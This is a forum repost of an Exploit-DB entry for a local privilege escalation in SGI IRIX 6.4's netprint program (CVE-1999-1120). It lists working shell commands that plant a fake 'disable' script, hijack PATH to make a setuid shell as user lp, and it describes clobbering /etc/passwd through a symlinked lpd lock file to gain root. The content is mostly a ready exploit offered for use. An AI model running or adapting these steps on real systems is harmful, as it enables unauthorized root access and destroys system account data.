Exploit SGI IRIX 6.4 - 'netprint' Local Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19313
Проверка EDB
  1. Пройдено
Автор
YURI VOLOBUEV
Тип уязвимости
LOCAL
Платформа
IRIX
CVE
cve-1999-1120
Дата публикации
1997-01-04
SGI IRIX 6.4 - 'netprint' Local Privilege Escalation
Код:
source: https://www.securityfocus.com/bid/395/info


A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.

% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell

However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
 
Источник
www.exploit-db.com

Похожие темы